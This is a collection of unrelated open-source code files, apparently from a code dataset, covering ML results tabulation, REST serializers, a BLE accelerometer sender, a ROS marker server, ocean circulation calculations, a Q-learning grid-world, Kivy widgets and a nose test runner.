next(f) # epochs: 100, training task: 9
except StopIteration:
print(dataset, algorithm, seed, task_id, epoch)
raise
for task in range(task_id + 1):
next(f)
###### FETUNING ###########
next(f)
if task_id == num_init_tasks - 1:
start_loop_at = 0
elif task_id == num_tasks - 1 and '_compositional' not in algorithm and '_dynamic' not in algorithm:
start_loop_at = 0
else:
start_loop_at = task_id
for task in range(start_loop_at):
next(f)
for task in range(start_loop_at, task_id + 1):
line = f.readline()
line = line.rstrip('\n')
i_0 = len('\ttask: {}\t'.format(task))
while i_0 != -1:
i_f = line.find(':', i_0)
key = line[i_0 : i_f]
i_0 = line.find(key + ': ', i_0) + len(key + ': ')
i_f = line.find('\t', i_0)
substr = line[i_0 : i_f] if i_f != -1 else line[i_0:]
try:
val = float(substr)
except:
if keep_component:
val = float(substr.split(',')[0].lstrip('('))
else:
val = float(substr.split(',')[1].rstrip(')'))
if task == task_id or task_id == num_init_tasks - 1:
finetuning_vals[algorithm][key][seed, task] = val
if task_id == num_tasks - 1 and '_compositional' not in algorithm and '_dynamic' not in algorithm:
final_vals[algorithm][key][seed, task] = val
i_0 = i_f if i_f == - 1 else i_f + 1
####### FORWARD TRANSFER #######
if ('_compositional' in algorithm or '_dynamic' in algorithm) and task_id != num_init_tasks - 1:
if task_id == num_tasks - 1:
start_loop_at = 0
next(f)
for task in range(start_loop_at):
next(f)
for task in range(start_loop_at, task_id + 1):
line = f.readline()
line = line.rstrip('\n')
i_0 = len('\ttask: {}\t'.format(task))
while i_0 != -1:
i_f = line.find(':', i_0)
key = line[i_0 : i_f]
i_0 = line.find(key + ': ', i_0) + len(key + ': ')
i_f = line.find('\t', i_0)
substr = line[i_0 : i_f] if i_f != -1 else line[i_0:]
try:
val = float(substr)
except:
if keep_component:
val = float(substr.split(',')[0].lstrip('('))
else:
val = float(substr.split(',')[1].rstrip(')'))
if task == task_id:
forward_transfer_vals[algorithm][key][seed, task] = val
if task_id == num_tasks - 1:
final_vals[algorithm][key][seed][task] = val
i_0 = i_f if i_f == - 1 else i_f + 1
else:
for task in range(start_loop_at, task_id + 1):
for key in finetuning_vals[algorithm]:
forward_transfer_vals[algorithm][key][seed, task] = finetuning_vals[algorithm][key][seed, task]
key = 'acc'
if key in jumpstart_vals[algorithm]:
jumpstart_vals_all_algos[key].append(jumpstart_vals[algorithm][key].mean())
jumpstart_errs_all_algos[key].append(jumpstart_vals[algorithm][key].mean(axis=1).std())
finetuning_vals_all_algos[key].append(finetuning_vals[algorithm][key].mean())
finetuning_errs_all_algos[key].append(finetuning_vals[algorithm][key].mean(axis=1).std())
forward_transfer_vals_all_algos[key].append(forward_transfer_vals[algorithm][key].mean())
forward_transfer_errs_all_algos[key].append(forward_transfer_vals[algorithm][key].mean(axis=1).std())
final_vals_all_algos[key].append(final_vals[algorithm][key].mean())
final_errs_all_algos[key].append(final_vals[algorithm][key].mean(axis=1).std())
names.append(algorithm.split('_')[0].upper() + ' ' + algorithm.split('_')[1].title())
# names.append(algorithm)
idx = [x[0] for x in sorted(enumerate(names), key=lambda x:name_order[x[1]])]
names = np.array(names)[idx]
key = 'acc'
if key in jumpstart_vals_all_algos:
# Sort by names to group by base algorithm
jumpstart_vals_all_algos[key] = np.array(jumpstart_vals_all_algos[key])[idx]
jumpstart_errs_all_algos[key] = np.array(jumpstart_errs_all_algos[key])[idx] / np.sqrt(num_seeds)
finetuning_vals_all_algos[key] = np.array(finetuning_vals_all_algos[key])[idx]
finetuning_errs_all_algos[key] = np.array(finetuning_errs_all_algos[key])[idx] / np.sqrt(num_seeds)
forward_transfer_vals_all_algos[key] = np.array(forward_transfer_vals_all_algos[key])[idx]
forward_transfer_errs_all_algos[key] = np.array(forward_transfer_errs_all_algos[key])[idx] / np.sqrt(num_seeds)
final_vals_all_algos[key] = np.array(final_vals_all_algos[key])[idx]
final_errs_all_algos[key] = np.array(final_errs_all_algos[key])[idx] / np.sqrt(num_seeds)
if key in jumpstart_vals[algorithm]:
jumpstart_vals_all_datasets[key].append(jumpstart_vals_all_algos[key])
jumpstart_errs_all_datasets[key].append(jumpstart_errs_all_algos[key])
finetuning_vals_all_datasets[key].append(finetuning_vals_all_algos[key])
finetuning_errs_all_datasets[key].append(finetuning_errs_all_algos[key])
forward_transfer_vals_all_datasets[key].append(forward_transfer_vals_all_algos[key])
forward_transfer_errs_all_datasets[key].append(forward_transfer_errs_all_algos[key])
final_vals_all_datasets[key].append(final_vals_all_algos[key])
final_errs_all_datasets[key].append(final_errs_all_algos[key])
key = 'acc'
if key in jumpstart_vals_all_datasets:
jumpstart_vals_all_datasets[key] = np.array(jumpstart_vals_all_datasets[key])
finetuning_vals_all_datasets[key] = np.array(finetuning_vals_all_datasets[key])
forward_transfer_vals_all_datasets[key] = np.array(forward_transfer_vals_all_datasets[key])
final_vals_all_datasets[key] = np.array(final_vals_all_datasets[key])
jumpstart_errs_all_datasets[key] = np.array(jumpstart_errs_all_datasets[key])
finetuning_errs_all_datasets[key] = np.array(finetuning_errs_all_datasets[key])
forward_transfer_errs_all_datasets[key] = np.array(forward_transfer_errs_all_datasets[key])
final_errs_all_datasets[key] = np.array(final_errs_all_datasets[key])
# Group by base algorithm
base_counts = np.array([sum(x.startswith('ER') for x in names),
sum(x.startswith('EWC') for x in names),
sum(x.startswith('VAN') for x in names),
sum(x.startswith('FM') for x in names)])
base_nocomponents_pos = np.cumsum(base_counts) - 1
base_column = (['ER'] * base_counts[0]
+ ['EWC'] * base_counts[1]
+ ['VAN'] * base_counts[2]
+ ['FM'] * base_counts[3]
)
best_idx_i = np.array([final_vals_all_datasets[key][:, base_nocomponents_pos[i-1]+1 if i > 0 else 0:base_nocomponents_pos[i]+1].argmax(axis=1) + (base_nocomponents_pos[i-1]+1 if i > 0 else 0) for i in range(len(base_counts)-1)])
best_idx_j = np.tile(np.arange(len(datasets)), (len(base_counts)-1, 1))
best_mask = np.zeros_like(final_vals_all_datasets[key].T, dtype=bool)
best_mask[best_idx_i, best_idx_j] = True
columns = ['Base', 'Algorithm'] + datasets
results_df = pd.DataFrame(columns=columns)
for name, base, row_val, row_err, row_best in zip(names, base_column, final_vals_all_datasets[key].T, final_errs_all_datasets[key].T, best_mask):
algo = version_map[name.split(' ')[1]]
row_dict = {'Base': base,'Algorithm': algo}
row_val *= 100
row_err *= 100
row_dict.update({
d: '**{:.1f}\u00B1{:.1f}**%'.format(val, err) if best else
'{:.1f}\u00B1{:.1f}%'.format(val, err) for d, val, err, best in zip(datasets, row_val, row_err, row_best)
})
results_df = results_df.append(row_dict, ignore_index=True)
results_df.set_index(['Base'],inplace=True)
print(results_df.to_markdown() + '\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create markdown results table lifelong compositional learning')
parser.add_argument('-T', '--num_tasks', dest='num_tasks', default=10, type=int, nargs='+')
parser.add_argument('-d', '--datasets', dest='datasets', default='MNIST',
choices=['MNIST', 'Fashion', 'CIFAR', 'CUB', 'Omniglot',
'Landmine', 'LondonSchool', 'FacialRecognition',
'MNISTPixels'],
nargs='+')
parser.add_argument('-alg', '--algorithms', dest='algos', default='er_compositional',
choices=['er_compositional', 'ewc_compositional', 'van_compositional',
'er_joint', 'ewc_joint', 'van_joint',
'er_nocomponents', 'ewc_nocomponents', 'van_nocomponents',
'er_dynamic', 'ewc_dynamic', 'van_dynamic',
'fm_compositional', 'fm_dynamic'],
nargs='+')
parser.add_argument('-e', '--num_epochs', dest='num_epochs', default=100, type=int)
parser.add_argument('-sf', '--save_frequency', dest='save_frequency', default=1, type=int)
parser.add_argument('-k', '--init_tasks', dest='num_init_tasks', default=4, type=int)
parser.add_argument('-n', '--num_seeds', dest='num_seeds', default=1, type=int)
parser.add_argument('-r', '--results_root', dest='results_root', default='./tmp/results')
args = parser.parse_args()
main(args.num_tasks,
args.datasets,
args.algos,
args.num_seeds,
args.num_init_tasks,
args.num_epochs,
args.save_frequency,
args.results_root) | StarcoderdataPython |
3229940 | <filename>backend/user_application/sources/serializers/user_serializers.py
from rest_framework import serializers
class UserSerializer(serializers.Serializer):
id = serializers.IntegerField()
username = serializers.CharField()
email = serializers.EmailField()
date_joined = serializers.DateTimeField()
last_login = serializers.DateTimeField()
class UserRegisterSerializer(serializers.Serializer):
email = serializers.EmailField()
password = serializers.CharField()
| StarcoderdataPython |
1653431 | # Provide an "eval()" service over BLE UART.
from adafruit_ble import BLERadio
from adafruit_ble.advertising.standard import ProvideServicesAdvertisement
from adafruit_ble.services.nordic import UARTService
from adafruit_circuitplayground import cp
import time
ble = BLERadio()
uart = UARTService()
advertisement = ProvideServicesAdvertisement(uart)
ble.start_advertising(advertisement)
print("Waiting to connect")
while True:
while not ble.connected:
pass
result = (cp.acceleration.x, cp.acceleration.y, cp.acceleration.z)
if result:
try:
uart.write(str(result).encode("utf-8"))
except Exception as e:
print(repr(e))
time.sleep(0.5) | StarcoderdataPython |
4818308 | #!/usr/bin/env python
"""
Copyright (c) 2011, <NAME>, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Willow Garage, Inc. nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES LOSS OF USE, DATA, OR PROFITS OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
import roslib; roslib.load_manifest("interactive_markers")
import rospy
import copy
from interactive_markers.interactive_marker_server import *
from interactive_markers.menu_handler import *
from geometry_msgs.msg import *
from visualization_msgs.msg import *
from tf import transformations
from tf import TransformListener
from jsk_2015_05_baxter_apc.msg import SetObjectPositionArray, WorkOrderArray
import rospkg
import yaml
server = None
menu_handler = MenuHandler()
counter = 0
objects_name_list = None
base_frame_id = "/base"
def frameCallback( msg ):
global counter, objects_name_list
counter+=1
if objects_name_list:
for object_name in objects_name_list:
int_marker = server.get(object_name)
if int_marker:
cur_pose = int_marker.pose
quat = transformations.quaternion_about_axis(2 * 3.14159286 * (1.0 / 1000), (0,0,1))
quat = transformations.quaternion_multiply([cur_pose.orientation.x, cur_pose.orientation.y, cur_pose.orientation.z, cur_pose.orientation.w], quat)
cur_pose.orientation.x = quat[0]
cur_pose.orientation.y = quat[1]
cur_pose.orientation.z = quat[2]
cur_pose.orientation.w = quat[3]
server.setPose(int_marker.name, cur_pose);
server.applyChanges()
def processFeedback( feedback ):
server.applyChanges()
def makeTargetObject( msg, object_name ):
marker = Marker()
marker.type = Marker.MESH_RESOURCE
marker.scale.x = msg.scale * 3
marker.scale.y = msg.scale * 3
marker.scale.z = msg.scale * 3
marker.mesh_resource = "package://jsk_apc2015_common/meshes/" + object_name +"/" + object_name + ".dae"
marker.mesh_use_embedded_materials = True
return marker
def makeBoardObject( msg , object_name):
marker = Marker()
marker.type = Marker.CUBE
marker.scale.x = 1
marker.scale.y = 5
marker.scale.z = 0.1
if object_name == "left_board":
marker.color.r = 1
marker.color.g = 0.2
marker.color.b = 0.2
marker.color.a = 0.5
else:
marker.color.r = 0.2
marker.color.g = 0.2
marker.color.b = 1
marker.color.a = 0.5
return marker
def makeDaeObject( msg , object_name):
marker = Marker()
marker.type = Marker.MESH_RESOURCE
marker.scale.x = msg.scale * 2
marker.scale.y = msg.scale * 2
marker.scale.z = msg.scale * 2
marker.mesh_resource = "package://jsk_apc2015_common/meshes/" + object_name +"/" + object_name + ".dae"
marker.mesh_use_embedded_materials = True
return marker
def makeTargetObjectControl( msg, object_name ):
control = InteractiveMarkerControl()
control.always_visible = True
control.markers.append( makeTargetObject(msg, object_name) )
msg.controls.append( control )
return control
def makeBoardObjectControl( msg, object_name ):
control = InteractiveMarkerControl()
control.always_visible = True
control.markers.append( makeBoardObject(msg, object_name) )
msg.controls.append( control )
return control
def makeDaeObjectControl( msg, object_name ):
control = InteractiveMarkerControl()
control.always_visible = True
control.markers.append( makeDaeObject(msg, object_name) )
msg.controls.append( control )
return control
def makeInteractiveBoardObject( object_name, position, quaternion):
global base_frame_id
int_marker = InteractiveMarker()
int_marker.header.frame_id = base_frame_id
int_marker.pose.position = position
int_marker.pose.orientation = quaternion
int_marker.scale = 1
makeBoardObjectControl(int_marker, object_name)
int_marker.controls[0].interaction_mode = InteractiveMarkerControl.NONE
int_marker.name = object_name
int_marker.description = object_name
server.insert(int_marker, processFeedback)
def makeInteractiveDaeObject( object_name, position, quaternion):
global base_frame_id
int_marker = InteractiveMarker()
int_marker.header.frame_id = base_frame_id
int_marker.pose.position = position
int_marker.pose.orientation = quaternion
int_marker.scale = 1
makeDaeObjectControl(int_marker, object_name)
int_marker.controls[0].interaction_mode = InteractiveMarkerControl.NONE
int_marker.name = object_name
int_marker.description = object_name
server.insert(int_marker, processFeedback)
def make6DofMarker( object_name, position, quaternion ):
global base_frame_id
int_marker = InteractiveMarker()
int_marker.header.frame_id = base_frame_id
int_marker.pose.position = position
int_marker.pose.orientation = quaternion
int_marker.scale = 1
makeTargetObjectControl(int_marker, object_name)
int_marker.controls[0].interaction_mode = InteractiveMarkerControl.MOVE_3D
int_marker.name = object_name
int_marker.description = object_name
server.insert(int_marker, processFeedback)
def setObjectPoses(msg):
global tl
for target_object in msg.objects:
int_marker = server.get(target_object.object_name)
if int_marker:
transed_point = tl.transformPoint(base_frame_id, target_object.position)
cur_pose = int_marker.pose
cur_pose.position = transed_point.point
server.setPose(int_marker.name, cur_pose);
server.applyChanges()
work_order_list={"right":[], "left":[]}
def setWithWorkOrder(msg, callback_args):
global work_order_list
arm = callback_args["arm"]
msg.array.reverse()
if len(work_order_list[arm]) == 0:
work_order_list[arm] = msg.array
target_counter = 0
grabbed_counter = 0
for target_object in work_order_list[arm]:
int_marker = server.get(target_object.object)
if int_marker:
cur_pose = Pose()
if target_object in msg.array:
cur_pose.position.y = 1 if arm == "left" else -1
cur_pose.position.x = - 0.5 - target_counter * 0.5
cur_pose.position.z = 0
cur_pose.orientation = int_marker.pose.orientation
target_counter+=1
else:
cur_pose.position.y = (2 + grabbed_counter * 0.5) * ( 1 if arm == "left" else -1)
cur_pose.position.x = 5.0
cur_pose.position.z = 2.6
cur_pose.orientation = int_marker.pose.orientation
grabbed_counter+=1
server.setPose(int_marker.name, cur_pose);
server.applyChanges()
if __name__=="__main__":
rospy.init_node("target_object_marker_server")
rospy.Subscriber('~set_pose', SetObjectPositionArray, setObjectPoses)
rospy.Subscriber('/left/work_order_list', WorkOrderArray, setWithWorkOrder, {"arm":"left"})
rospy.Subscriber('/right/work_order_list', WorkOrderArray, setWithWorkOrder, {"arm":"right"})
tl = TransformListener()
rospy.Timer(rospy.Duration(0.01), frameCallback)
server = InteractiveMarkerServer("target_object_marker_server")
rospack = rospkg.RosPack()
with open(rospack.get_path("jsk_2015_05_baxter_apc") + "/data/object_list.yml", 'rb') as f:
objects_name_list = yaml.load(f)
for i,object_name in enumerate(objects_name_list):
position = Point( - i / 5 - 5 , i % 5 - 2.5, 0)
quat = transformations.quaternion_about_axis(2 * 3.14159286 * (i * 1.0 / len(objects_name_list)), (0,0,1))
quaternion = Quaternion(quat[0], quat[1], quat[2], quat[3])
make6DofMarker( object_name, position, quaternion )
position = Point( -2.8, -0.8, 0)
quat = transformations.quaternion_about_axis(3.14159286/2, (0,0,1))
quaternion = Quaternion(quat[0], quat[1], quat[2], quat[3])
makeInteractiveBoardObject("left_board", position, quaternion)
position = Point( -2.8, 0.8, 0)
makeInteractiveBoardObject("right_board", position, quaternion)
makeInteractiveBoardObject("right_board", position, quaternion)
position = Point( 5, 0, 2)
makeInteractiveDaeObject("score_board", position, quaternion)
server.applyChanges()
rospy.spin()
| StarcoderdataPython |
1724808 | <gh_stars>0
from kivy.uix.textinput import TextInput
from kivy.properties import NumericProperty
import math
class IntEntry(TextInput):
value = NumericProperty(0.0)
def __init__(self, low=-math.inf, high=math.inf, **kwds):
if low >= 10:
# Because otherwise we couldn't ever type the first digit
# TODO: figure out how to fix this
raise ValueError('low must be less than 10')
if low >= high:
raise ValueError('Empty slider')
self.low = low
self.high = high
digits = math.log10(max(abs(low), abs(high))) + 1
self._width = int(min(digits, 12)) + (low < 0)
super().__init__(multiline=False, **kwds)
def insert_text(self, substring, from_undo=False):
c = self.cursor[0]
text = self.text[:c] + substring + self.text[c:]
if self._validate(text):
super().insert_text(substring, from_undo=from_undo)
def on_text(self, _, text):
self.value = int(text or '0')
def on_value(self, _, value):
self.text = str(value)
def _validate(self, text):
if text == '' or self.low < 0 and text == '-':
return True
try:
return self.low <= int(text) <= self.high
except Exception:
pass
class IntEntry2(TextInput):
value = NumericProperty(0.0)
def __init__(self, low=-math.inf, high=math.inf, **kwds):
if low >= 10:
# Because otherwise we couldn't ever type the first digit
# TODO: figure out how to fix this
raise ValueError('low must be less than 10')
if low >= high:
raise ValueError('Empty slider')
self.low = low
self.high = high
digits = math.log10(max(abs(low), abs(high))) + 1
self._width = int(min(digits, 12)) + (low < 0)
super().__init__(multiline=False, **kwds)
def insert_text(self, substring, from_undo=False):
c = self.cursor[0]
text = self.text[:c] + substring + self.text[c:]
if self._validate(text):
super().insert_text(substring, from_undo=from_undo)
def on_text(self, _, text):
self.value = int(text or '0')
def on_value(self, _, value):
self.text = str(value)
def _validate(self, text):
if text == '' or self.low < 0 and text == '-':
return True
try:
return self.low <= int(text) <= self.high
except Exception:
pass
| StarcoderdataPython |
3274357 | """Calculations with grid-aware data sets."""
import xgcm
def calculate_moc(ds, region=""):
"""Calculate the MOC.
Parameters
----------
ds : xarray dataset
A grid-aware dataset as produced by `xorca.lib.preprocess_orca`.
region : str
A region string. Examples: `"atl"`, `"pac"`, `"ind"`.
Defaults to `""`.
Returns
-------
moc : xarray data array
A grid-aware data array with the moc for the specified region. The
data array will have a coordinate called `"lat_moc{region}"` which is
the weighted horizontal and vertical avarage of the latitude of all
latitudes for the given point on the y-axis.
"""
grid = xgcm.Grid(ds, periodic=["Y", "X"])
vmaskname = "vmask" + region
mocname = "moc" + region
latname = "lat_moc" + region
weights = ds[vmaskname] * ds.e3v * ds.e1v
Ve3 = weights * ds.vomecrty
# calculate indefinite vertical integral of V from bottom to top, then
# integrate zonally, convert to [Sv], and rename to region
moc = grid.cumsum(Ve3, "Z", to="left", boundary="fill") - Ve3.sum("z_c")
moc = moc.sum("x_c")
moc /= 1.0e6
moc = moc.rename(mocname)
# calculate the weighted zonal and vertical mean of latitude
lat_moc = ((weights * ds.llat_rc).sum(dim=["z_c", "x_c"]) /
(weights).sum(dim=["z_c", "x_c"]))
moc.coords[latname] = (["y_r", ], lat_moc.data)
# also copy the relevant depth-coordinates
moc.coords["depth_l"] = ds.coords["depth_l"]
return moc
def calculate_psi(ds):
"""Calculate the barotropic stream function.
Parameters
----------
ds : xarray dataset
A grid-aware dataset as produced by `xorca.lib.preprocess_orca`.
Returns
-------
psi : xarray data array
A grid-aware data array with the barotropic stream function in `[Sv]`.
"""
grid = xgcm.Grid(ds, periodic=["Y", "X"])
U_bt = (ds.vozocrtx * ds.e3u).sum("z_c")
psi = grid.cumsum(- U_bt * ds.e2u, "Y") / 1.0e6
psi -= psi.isel(y_r=-1, x_r=-1) # normalize upper right corner
psi = psi.rename("psi")
return psi
def calculate_speed(ds):
"""Calculate speed on the central (T) grid.
First, interpolate U and V to the central grid, then square, add, and take
root.
Parameters
----------
ds : xarray dataset
A grid-aware dataset as produced by `xorca.lib.preprocess_orca`.
Returns
-------
speed : xarray data array
A grid-aware data array with the speed in `[m/s]`.
"""
grid = xgcm.Grid(ds, periodic=["Y", "X"])
U_cc = grid.interp(ds.vozocrtx, "X", to="center")
V_cc = grid.interp(ds.vomecrty, "Y", to="center")
speed = (U_cc**2 + V_cc**2)**0.5
return speed
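# Hypothetical usage sketch (not part of the original module). It assumes `ds`
# is a grid-aware dataset produced by `xorca.lib.preprocess_orca`, as the
# docstrings above require:
#
#     psi = calculate_psi(ds)                    # barotropic stream function [Sv]
#     moc_atl = calculate_moc(ds, region="atl")  # Atlantic overturning [Sv]
#     speed = calculate_speed(ds)                # speed on the T grid [m/s]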
| StarcoderdataPython |
80679 | <reponame>Octavian-ai/synthetic-graph-data<gh_stars>10-100
from basic_types import NanoType
class Style(NanoType[str]):
pass | StarcoderdataPython |
159659 | """
Reinforcement Learning Using Q-learning, Double Q-learning, and Dyna-Q.
Copyright (c) 2020 <NAME>
References
----------
- Based on project 7 in the Georgia Tech Spring 2020 course "Machine Learning
for Trading" by Prof. <NAME>.
- Course: http://quantsoftware.gatech.edu/CS7646_Spring_2020
- Project: http://quantsoftware.gatech.edu/Spring_2020_Project_7:_Qlearning_Robot
- Main book reference: Sutton and Barto, "Reinforcement Learning: An Introduction"
(http://incompleteideas.net/book/the-book-2nd.html)
Characteristics
---------------
- The code has been written and tested in Python 3.7.7.
- Q-learning implementation for reinforcement learning.
- Options: basic Q-learning, Dyna-Q (for model planning), double Q-learning (to
avoid maximization bias).
- Dyna-Q has been implemented with both a deterministic model and a probabilistic
model.
- The deterministic model and the probabilistic model both have two versions, one
using dictionaries (less memory but slower) and one using arrays (more memory
but faster).
- Double Q-learning can be used with basic Q-learning as well as with Dyna-Q.
- The Q-learning class in <QLearner.py> can be used for any reinforcement learning
  problem, while <robot.py> and <test.py> are specific to a grid-world type of
problem (i.e. finding the best policy to go from a start point to a goal point).
- Usage: python test.py <csv-filename>.
Parameters
----------
sys.argv[1]
File name with the map layout passed as argument. It must be in a csv file,
with the map elements specified using integer numbers.
map_elements
List of elements allowed in the map layout.
reward_list
List of rewards associated to each element in <map_elements>.
move_list
List of allowed moves for the robot.
episodes
Number of episodes (each episode is a trip from start to goal)
max_steps
Maximum number of steps allowed to reach the goal (for each episode).
0 <= random_rate <= 1
Probability the robot will move randomly instead to move as required.
0 <= alpha <= 1
Learning rate (used to vary the weight given to new experiences compared with
past Q-values).
0 <= gamma <= 1
Discount factor (used to progressively reduce the value of future rewards).
0 <= rar <= 1
Probability of selecting a random action instead of using the action derived
from the Q-table(s) (i.e. probability to explore).
0 <= radr <= 1
Rate decay for the probability to explore (used to reduce the probability to
explore with time).
dyna >= 0
Number of simulated updates in Dyna-Q (when equal to zero Dyna-Q is not used).
model_type = 1, 2, 3, 4
Type of model used for the simulation in Dyna-Q (1-2 are deterministic models,
3-4 are probabilistic models).
double_Q = True, False
Specifies if double Q-learning is used (to avoid maximization bias).
Examples
--------
All examples are for the map layout in `map.csv`. All initial data are as in this
file, except when differently specified.
- Basic Q-learning, episodes = 1000, dyna = 0
REWARDS: mean = -63.1, median = -32.0, std = 109.8
STEPS: mean = 62.1, median = 34.0, std = 96.3
Number of updates done: 62085
BEST PATH: rewards = -22.0, Steps = 24.0
- Double Q-learning, episodes = 1000, dyna = 0
REWARDS: mean = -85.0, median = -40.0, std = 132.7
STEPS: mean = 85.5, median = 42.0, std = 130.5
Number of updates done: 85473
BEST PATH: rewards = -22.0, Steps = 24.0
- Double Q-learning, episodes = 50, dyna = 200, model_type = 1
REWARDS: mean = -70.7, median = -28.0, std = 158.5
STEPS: mean = 52.9, median = 30.0, std = 93.5
Number of updates done: 531243
BEST PATH: rewards = -22.0, Steps = 24.0
- Basic Q-learning, episodes = 50, dyna = 200, model_type = 4
REWARDS: mean = -92.7, median = -42.5, std = 183.9
STEPS: mean = 76.9, median = 44.5, std = 94.5
Number of updates done: 567340
Number of updates skipped: 205103
BEST PATH: rewards = -22.0, Steps = 24.0
- Basic Q-learning, episodes = 1000, dyna = 0, but using an 8-way robot
REWARDS: mean = -66.6, median = -25.0, std = 120.9
STEPS: mean = 63.3, median = 27.0, std = 100.1
Number of updates done: 63261
BEST PATH: rewards = -13.0, Steps = 15.0
"""
import sys
import numpy as np
import QLearner as ql
import robot as rb
# Elements allowed in the map
map_elements = [' ', # 0 = empty space
'#', # 1 = wall/obstacle
'S', # 2 = start (must be defined)
'G', # 3 = goal (must be defined)
'~'] # 4 = sand
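
# For illustration only: a hypothetical 4x5 layout (not necessarily the bundled
# map.csv) with the start 'S'=2 in the lower-left corner, the goal 'G'=3 in the
# upper-right corner, a short wall of '#'=1 and a patch of sand '~'=4 would be
# written as
#
#   0,0,0,0,3
#   0,1,1,4,0
#   0,0,0,4,0
#   2,0,0,0,0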
# Rewards (must correspond to elements in the map)
reward_list = np.array([-1.0, # empty space
-1.0, # wall/obstacle
-1.0, # start (walk-back)
+1.0, # goal
-100.0]) # sand
# Directions of motion (4-way robot)
move_list = np.array([[-1, 0], # Go North one step
[ 0, +1], # Go East one step
[+1, 0], # Go South one step
[ 0, -1]]) # Go West one step
# Directions of motion (8-way robot)
# move_list = np.array([[-1, 0], # Go North one step
# [-1, +1], # Go North-East one step
# [ 0, +1], # Go East one step
# [+1, +1], # Go South-East one step
# [+1, 0], # Go South one step
# [+1, -1], # Go South-West one step
# [ 0, -1], # Go West one step
# [-1, -1]]) # Go North-West one step
# Other grid-world parameters
episodes = 1000 # Number of episodes
max_steps = 10000 # Max. number of steps for each episode
random_rate = 0.2 # Probability the robot will move randomly
# Q-learner parameters
alpha = 0.2 # Learning rate
gamma = 0.9 # Discount factor
rar = 0.50 # Probability to explore
radr = 0.99 # Rate decay for the probability to explore
dyna = 0 # Number of simulated updates in Dyna-Q (not used if zero)
model_type = 1 # Type of model used for the simulation in Dyna-Q
# 1 = Deterministic model (T and R defined as dictionaries)
# 2 = Deterministic model (T and R defined as arrays)
# 3 = Probabilistic model (T and R defined as dictionaries)
# 4 = Probabilistic model (T and R defined as arrays)
double_Q = False # True = use double Q-learning
# False = don't use double Q-learning
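
# For reference (not a setting): a tabular learner of this kind is expected to
# use the standard Q-learning update
#
#   Q(s, a) <- (1 - alpha) * Q(s, a) + alpha * (r + gamma * max_a' Q(s', a'))
#
# Double Q-learning (double_Q = True) keeps two such tables, selecting the
# argmax action with one and evaluating it with the other, which avoids the
# maximization bias of the single-table update.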
# ======= Main Code ======= #
np.random.seed(1)
# Read the map layout from the csv file specified on the command line
if (len(sys.argv) != 2):
    print("Usage: python test.py <csv-filename>")
    sys.exit(1)
map_layout = np.asarray(np.loadtxt(sys.argv[1], delimiter=','), dtype=int)
# Initialize robot and map quantities
bot = rb.robot(map_layout, map_elements, reward_list, move_list, max_steps=max_steps,
random_rate=random_rate)
# Initialize the Q-learner
num_states = map_layout.size
num_actions = move_list.shape[0]
learner = ql.QLearner(num_states, num_actions, alpha=alpha, gamma=gamma, rar=rar,
radr=radr, dyna=dyna, double_Q=double_Q, model_type=model_type)
# Build the Q-table(s)
scores, steps = bot.optimize_path(learner, episodes)
# Print results
print()
print("REWARDS: mean = {0:6.1f}, median = {1:6.1f}, std = {2:5.1f}"
.format(np.mean(scores), np.median(scores), np.std(scores)))
print("STEPS: mean = {0:6.1f}, median = {1:6.1f}, std = {2:5.1f}"
.format(np.mean(steps), np.median(steps), np.std(steps)))
print("Number of updates done: ", learner.count_update_Q)
if (dyna > 0 and (model_type == 2 or model_type == 4)):
    print("Number of updates skipped: ", learner.count_skip)
# Print best map and corresponding rewards and steps
best_map, best_reward, best_step = bot.best_path(learner)
bot.show_map(best_map)
print("BEST PATH: rewards = {0:5.1f}, Steps = {1:5.1f}".
format(best_reward, best_step))
| StarcoderdataPython |
1604118 | # -*- coding: utf-8 -*-
'''
The main test runner script.

Usage: ::

    python run_tests.py

Skip slow tests: ::

    python run_tests.py fast

When there's no Internet: ::

    python run_tests.py no-internet
'''
from __future__ import unicode_literals
import nose
import sys


def main():
    args = get_argv()
    success = nose.run(argv=args)
    sys.exit(0) if success else sys.exit(1)


def get_argv():
    args = [sys.argv[0], "tests", '--verbosity', '2']
    attr_conditions = []
    # Attribute names are assumed to match the @attr markers used in the tests.
    if "fast" in sys.argv:
        attr_conditions.append("not slow")
    if "no-internet" in sys.argv:
        attr_conditions.append("not requires_internet")
    attr_conditions.append("not skip")
    attr_expression = " and ".join(attr_conditions)
    if attr_expression:
        args.extend(["-A", attr_expression])
    return args


if __name__ == '__main__':
    main()
| StarcoderdataPython |